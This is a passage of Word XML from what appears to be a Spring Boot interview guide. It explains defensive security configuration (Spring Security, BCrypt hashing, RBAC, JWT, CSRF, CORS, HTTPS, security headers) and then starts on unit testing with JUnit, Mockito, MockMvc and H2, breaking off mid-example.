    <w:p w14:paraId="4263D0BC" w14:textId="512075F3"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e Spring Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100257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the most commonly used library for securing a Spring Boot application. It provides authentication, authorization, and protection against various attacks (e.g., CSRF, XSS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E1510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dd Spring Security, you need to add the dependency in the pom.xml (for Maven):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ED94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F5712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A6B5BF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53B396D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BAF02A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 automatically configures basic HTTP security for your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7405E296"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nable Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D28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APIs, you can enable basic authentication where users provide their credentials as part of the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E4C1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0EA333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43BB11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7AA6E35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6F6CD38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3CFBC8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223B09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4DEDA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305042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206E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ing basic authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E229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2B5D8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B0DC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orm-Based Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can configure Spring Security to handle form login:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450781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4BFC05A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E721BE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signup").permitAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA562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55B74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286231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loginPage("/login").permitAll();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFC27CF"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assword Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8FE19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ssword hashing</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to securely store passwords. You can configure Spring Security to use BCryptPasswordEncoder or another password encoder:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCDB9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4473C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sswordEncoder passwordEncoder() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1A104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2EF03B9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2B76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that passwords are hashed when saved to the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B78CFD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ole-Based Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C953C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mplement </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>role-based access control</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (RBAC) to authorize users based on their roles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9EC9E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8B3DA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16DF27A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9FFDD7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7E0353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2F663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EB323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3970C96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dmin/**").hasRole("ADMIN")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EB907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user/**").hasRole("USER")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0613195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25BF600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39D4462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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9372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A6E9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54D53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JWT (JSON Web Token) for Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8516E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for stateless authentication. Instead of storing session information on the server, you can encode a JWT containing user data and send it in HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CD112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tegrate JWT-based authentication by adding filters to intercept incoming requests and validate the JWT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37181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2811D6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the user logs in, generate a JWT token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E52DCE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response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF2536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very subsequent request, the client sends the token in the Authorization header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A757D9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Security filter validates the token before allowing access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185EE8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SRF Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0BA6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oss-Site Request Forgery (CSRF)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacks can be mitigated by enabling CSRF protection in Spring Security. By default, Spring Security enables CSRF protection for all applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360C3C2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enable(); // CSRF protection enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6B96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isable CSRF for specific situations (e.g., for stateless REST APIs) by configuring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5075D4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disable();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53586A67"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ORS (Cross-Origin Resource Sharing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F6DEE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To secure your APIs from unauthorized cross-origin requests, configure </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CORS</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Cross-Origin Resource Sharing) policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D192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83D0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2E4AF00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BE6B08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CorsMappings(CorsRegistry registry) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C100F0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Mapping("/api/**")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1D58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Origins("https://example.com")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D577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Methods("GET", "POST");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F67B45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7D57B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B9C2FC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S (SSL/TLS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E2972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Enabl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by configuring an SSL certificate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCD782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 in application.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31883B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5259BF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5821744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16765A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55844F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key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF8C28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all communication between the client and the server is encrypted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154A93F3"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Session Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691A96E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configure </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>session management</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to prevent attacks like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>session fixation</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ssion hijacking</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1B5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7F385EF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ssionManagement()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309F6C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ximumSessions(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0FEEB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piredUrl("/login?expired");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514596C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Protect Against XSS (Cross-Site Scripting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B648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ect your application from XSS by properly escaping any untrusted data that is displayed on your pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0477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libraries like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OWASP Java HTML Sanitiz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Soup</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to sanitize the input data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F73D78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Security Headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A20EF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ecurity headers to protect the application from attacks like clickjacking and content-sniffing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA3F72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194E8F2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eaders()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D5C2A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rameOptions().deny()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249936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rictTransportSecurity().includeSubDomains().maxAgeInSeconds(31536000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BCFDD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1626F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xssProtection().block(true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386DB77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6424F3B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ntSecurityPolicy("default-src 'self'");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A615A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Audit Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1699C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audit logging to track sensitive actions and ensure compliance with security policies. For example, log every failed login attempt or changes made by an admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DA78F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OAuth2 Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5E9A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pplications that need integration with third-party authentication providers (Google, Facebook, etc.), you can us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authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B508E4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provides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support for handling OAuth2 login and token-based authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6DF0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Security Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B195F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ways follow security best practices like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D297D7"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ularly updating your dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65180A04"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strong password policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66451F7B"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miting access to sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D59E5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firewalls and network security configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1227E4E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nimizing privilege (principle of least privilege).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F84D9A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ing two-factor authentication (2FA) if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469E48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applying these techniques, you can secure your Spring Boot applications against most common security threats and ensure that your data and users are protected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A809762" w14:textId="3E0E9B66"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F9751D">
          <v:rect id="_x0000_i2745" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="507FC8A4" w14:textId="418F22C1" w:rsidR="003B7480" w:rsidRPr="00CE4B95" w:rsidRDefault="003B7480" w:rsidP="003B7480">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="681" w:name="_Toc197867895"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you write unit tests in Spring Boot?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="681"/>
    </w:p>
    <w:p w14:paraId="49112E2E" w14:textId="4F75E12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Writing unit tests in Spring Boot is crucial for ensuring the correctness of your application. Spring Boot provides several tools to help you write effective unit tests using frameworks like </w:t>
      </w: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and </w:t>
      </w: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Here's how you can write unit tests in a Spring Boot application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3325898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Add Testing Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4219F2A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nsure you have the required dependencies for testing in your pom.xml (for Maven) or build.gradle (for Gradle).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787FF9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Maven</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A56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43D8C0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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4F95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artifactId&gt;spring-boot-starter-test&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212125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scope&gt;test&lt;/scope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9F628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709340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Gradle</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1904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Implementation 'org.springframework.boot:spring-boot-starter-test'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CF99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his includes popular testing libraries like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2546FA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for unit testing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1087D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for mocking dependencies)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2837A57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xml:space="preserve"> (for integration testing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D26F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fluent assertions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191A31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Hamcrest</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for matchers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE1291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Write Unit Tests Using JUnit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F1347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nit tests are typically written using JUnit. Spring Boot's spring-boot-starter-test automatically includes </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JUnit 5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (@Test annotation) by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3476710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 simple unit test for a service class might look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDBE5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51085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35E3EEE6" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0450AC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2604AD2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C733EE2" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C4020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336EA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3CD034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1A7FDA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ult).isEqualTo("Expected Result");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EB94E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9BC9E8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419E8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3100DE1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annotation tells Spring Boot to look for the main configuration class (@SpringBootApplication) and use it to configure the test context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0954E1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quired service class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1860F66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is a JUnit annotation to mark the method as a test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADA364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Mocking Dependencies with Mockito</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0061C9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Often, you need to mock the dependencies of your service classes to isolate the unit you're testing. You can us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to mock the dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42863AF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329122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tendWith(MockitoExtension.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F77B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54518AC" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66D04F8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6088E8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7F5DC7D5" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BC825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InjectMocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585361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1CAF9AA" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32D8B0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 xml:space="preserve">    @Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEB516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079F29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Repository.findById(1L)).thenReturn(Optional.of(new MyEntity()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000D8C7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result = myService.getMyEntity(1L);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D360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NotNull(result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2222D3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D0B4A7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534CC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7595AA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 Mocks the MyRepository dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C0C1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InjectMocks: Injects the mocked dependencies into the MyService class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C491E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hen(...).thenReturn(...): Defines the behavior of the mock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1DDF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Testing Controller Methods (MockMvc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371D8F4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You can test the controllers using </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MockMvc</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which allows you to simulate HTTP requests and assert the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040DAD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1BD4F8A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MyController.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54538C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2437BFC7" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09C4F0F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35BF12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ockMvc mockMvc;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593ED6A1" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ABCD58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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19594D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2089C30" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F5CA4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018B1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GetMapping() throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E52385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Service.getMyEntity(1L)).thenReturn(new MyEntity());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1348E49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Mvc.perform(get("/api/my-entity/1"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E75123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status().isOk())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C47F69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jsonPath("$.id").value(1));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCC8EA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5883C5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67F692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20F233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 This annotation focuses only on Spring MVC components (controllers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AA79F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Bean: Mocks the MyService bean in the Spring context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5514D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Mvc: Simulates HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1448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get("/api/my-entity/1"): Performs a GET request to the specified URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5133F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status().isOk()): Asserts that the response status is 200 OK.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5109B9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jsonPath("$.id").value(1)): Asserts that the id field in the JSON response is 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1E25E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Test with In-Memory Database (H2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A04C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For testing the repository layer, you can use an </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>in-memory database</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like H2. This allows you to test database interactions without relying on an actual database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AD797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21A36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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B17B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RepositoryTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCD250A" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3212B3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12875CD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6E008601" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2521CA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C6361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aveAndFindEntity() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA9F2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entity = new MyEntity("Test");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BF19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Repository.save(entity);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B34C4D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Optional&lt;MyEntity&gt; result = myRepository.findById(entity.getId());</w:t>
      </w:r>
